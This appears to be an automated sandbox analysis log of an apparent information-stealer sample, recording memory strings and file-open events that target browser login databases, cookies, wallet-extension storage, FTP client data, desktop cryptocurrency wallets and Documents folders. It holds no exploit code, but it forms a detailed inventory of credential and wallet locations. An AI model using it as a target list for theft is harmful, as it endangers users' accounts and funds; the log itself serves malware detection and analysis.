            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets
            Source: uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
            Source: uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
            Source: uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
            Source: uU6IvUPN39.exe, 00000000.00000002.1539384003.00000000006F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
